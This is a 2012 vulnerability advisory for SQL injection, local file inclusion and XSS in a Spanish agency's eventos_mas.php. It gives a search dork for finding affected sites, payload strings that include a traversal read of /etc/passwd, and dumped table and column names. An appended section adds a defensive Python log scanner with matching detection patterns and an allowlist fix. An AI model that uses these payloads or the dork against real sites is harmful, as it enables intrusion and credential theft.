Agencia[e] XSS / LFI / SQL Injection

2012-11-19 / 2012-11-20
Credit: Ur0b0r0x
Risk: High
Local: No
Remote: Yes
CVE: N/A

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Twitter: @Ur0b0r0x
# Email: ur0b0r0x_4n1@live.com
# Line: GreyHat
# Exploit Title: Agencia[e] - SQL Injection / LFI / XSS Vulnerabilities
# Dork: intext: inurl:eventos_mas.php?ideve=
# Date: 16/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.agenciae.tv/
# Vendor Name: Agencia[e]
# Tested On: Backtrack R3 / Linux Mint
# Type: php
# Info: Official Center Porsche In Spain

------------------- Agreement --------------------
[12/11/2012] - Vulnerability discovered
[15/11/2012] - Vendor notified, did not respond
[16/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################

http://site.com/eventos_mas.php?ideve= < Sql Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < LFi Vulnerability Path >
http://site.com/eventos_mas.php?ideve= < XSS Vulnerability Path >

# Exploit/Command/Sql=> +union+select+1,2,3,4--+
# Exploit/Command/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Exploit/Command/Lfi=> /../../../../../../../etc/passwd%00/../../../
# Payload/Command/Sql=> table_schema=00x5E6536C65716672756732423423 / table_name=0x44F6277C616670x5E6536C65756546269

# Demo_Xss_Sql_Vulnerabilities

# The Same Tables And Columns All Site Vulnerability

+----------+
| control  |
| eventos  |
| noticias |
| usuarios |
+----------+

+---------+
| Column  |
+---------+
| alias   |
| id      |
| nombre  |
| pwd     |
| sid     |
| url     |
| usuario |
+---------+
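
A log-review check for the request shapes this advisory lists against eventos_mas.php, added here as an example and not part of the original advisory. It assumes a combined-format web access log and that ideve is meant to be a numeric event id; the log lines, the /index.php path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Nov/2012:10:01:02 +0100] "GET /eventos_mas.php?ideve=14 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [16/Nov/2012:10:01:09 +0100] "GET /eventos_mas.php?ideve=14%27 HTTP/1.1" 200 611',
    '198.51.100.9 - - [16/Nov/2012:10:01:15 +0100] "GET /eventos_mas.php?ideve=14+union+select+1,2,3,4--+ HTTP/1.1" 200 734',
    '198.51.100.9 - - [16/Nov/2012:10:02:41 +0100] "GET /eventos_mas.php?ideve=/../../../etc/passwd%00 HTTP/1.1" 200 98',
    '198.51.100.9 - - [16/Nov/2012:10:03:05 +0100] "GET /eventos_mas.php?ideve=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [16/Nov/2012:10:04:00 +0100] "GET /index.php?id=3 HTTP/1.1" 200 2048',
]

# Payload shapes taken from the advisory, matched after URL decoding.
RULES = [
    ("sqli", re.compile(r"'|\bunion\b.+\bselect\b|--|\btable_(?:schema|name)\b", re.I)),
    ("lfi", re.compile(r"\.\./|\x00|/etc/passwd", re.I)),
    ("xss", re.compile(r"[<>\"]|\bon\w+\s*=", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return [] for a plain integer id, otherwise the matching labels."""
    if re.fullmatch(r"\d{1,10}", value):
        return []
    labels = [name for name, rx in RULES if rx.search(value)]
    # Anything that is neither an integer nor a known shape is still suspect.
    return labels or ["non-numeric"]

def scan(lines, script="eventos_mas.php", param="ideve"):
    """Return (line number, client, labels, decoded value) for suspect requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs URL-decodes, so %27, %00 and %3C are seen as raw characters.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            labels = classify(value)
            if labels:
                findings.append((n, line.split()[0], labels, value))
    return findings

if __name__ == "__main__":
    for lineno, client, labels, value in scan(SAMPLE_LOG):
        print(lineno, client, ",".join(labels), repr(value))
```

The same allowlist (accept only digits for ideve, reject everything else before it reaches a query, a file path or the page output) is the server-side fix for all three issues.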

References:

http://www.agenciae.tv/

